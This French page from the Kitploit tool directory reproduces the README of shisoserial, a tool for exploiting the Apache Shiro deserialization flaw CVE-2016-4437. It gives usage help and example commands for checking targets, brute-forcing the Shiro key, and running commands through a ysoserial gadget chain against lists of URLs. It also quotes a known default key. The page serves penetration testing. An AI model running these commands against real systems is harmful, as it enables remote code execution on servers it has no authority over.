Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
shisoserial — Un outil d'exploitation rapide pour la vulnérabilité de désérialisation Shiro (CVE-2016-4437) / Un outil simple ciblant les attaques du framework Shiro avec ysoserial. | Kitploit
Outils/GitHubGitHub/4nth0ny1130/shisoserial
Génération de PayloadsAnalyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionCommandement et Contrôle
GitHub4nth0ny1130/shisoserial

shisoserial

Un outil d'exploitation rapide pour la vulnérabilité de désérialisation Shiro (CVE-2016-4437) / Un outil simple ciblant les attaques du framework Shiro avec ysoserial.

Voir le dépôt
2422il y a 4 ansVérifié par Kitploit

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

shisoserial

English Document

Qu'est-ce que c'est ?

Un outil d'exploitation rapide pour la vulnérabilité de désérialisation Shiro (CVE-2016-4437).

Contributeurs

4nth0ny @ Laboratoire Vendredi

Les issues/PR sont les bienvenus.

:)

Environnement

  • python 3.x

  • JDK 1.8

Installation

root@kitploit:~
python3 -m pip install -r requirements.txt

pour AttributeError: module 'Crypto.Cipher.AES' has no attribute 'MODE_GCM' ou No module named 'Crypto'

root@kitploit:~
python3 -m pip uninstall crypto pycryptodome
python3 -m pip install pycryptodome

Utilisation

root@kitploit:~
usage: shisoserial.py [-h] --mode MODE --url  [--type default:CBC] [--data] [--key] [--gadget] [--command default:whoami] [--proxies] [--ser] [--thread]

This is a simple tool to attack framework shiro with ysoserial

optional arguments:
  -h, --help            show this help message and exit
  --mode MODE, -m MODE  check/crack/yso/echo/encode
  --url , -u            Target URL address or the file containing the target URL
  --type default:CBC, -t default:CBC
                        Cipher Type, GCM or CBC
  --data , -d           Using this parameter will make HTTP request with POST method
  --key , -k            Specify a Shiro Key or will use dictionary brute force cracking
  --gadget , -g         Specific Ysoserial Gadget
  --command default:whoami, -c default:whoami
                        Specific Execute Command
  --proxies , -p        Specific Proxy
  --ser , -s            Specific serialize file name
  --thread , -T         Specific the number of threads

Exemples

Vérifier si la cible utilise le framework Shiro (avec chiffrement CBC par défaut)

root@kitploit:~
python3 shisoserial.py -m check -u http://127.0.0.1:8080

Forcer la clé Shiro de la cible avec un proxy et le chiffrement CBC

root@kitploit:~
python3 shisoserial.py -m crack -u http://*.*.*.*:**** -t CBC -p ****://*.*.*.*:****/

Utiliser la chaîne CommonsCollectionsK1 pour exécuter une commande et en obtenir le résultat

root@kitploit:~
python3 shisoserial.py -m echo -u http://127.0.0.1:8080 -g CommonsCollectionsK1 -c id

Valider en masse une clé Shiro spécifiée avec une requête POST

root@kitploit:~
python3 shisoserial.py -m crack -u target_urls.txt -k kPH+bIxk5D2deZiIxcaaaA== -d username=1

image-20211229223405240

Utiliser un fichier de données sérialisées pour construire la charge utile et l'envoyer en masse avec plusieurs threads

root@kitploit:~
python3 shisoserial.py -m encode -u target_urls.txt -t cbc -s 1.ser -T 4

image-20211230181021173

Avertissement

Cet outil est destiné uniquement à être utilisé dans le cadre d'une sécurité d'entreprise ayant obtenu une autorisation légale suffisante. Lors de son utilisation, vous devez vous assurer que tous vos comportements sont conformes aux lois et réglementations locales. Si vous vous livrez à des activités illégales en utilisant cet outil, vous assumerez seul toutes les conséquences. Tous les développeurs et contributeurs de cet outil déclinent toute responsabilité légale ou conjointe. À moins que vous n'ayez lu, compris et accepté toutes les clauses du présent accord, veuillez ne pas installer ni utiliser cet outil. Le fait d'utiliser cet outil ou d'accepter cet accord par tout autre moyen explicite ou implicite sera considéré comme votre acceptation et votre adhésion aux termes de cet accord.

Télécharger l’outil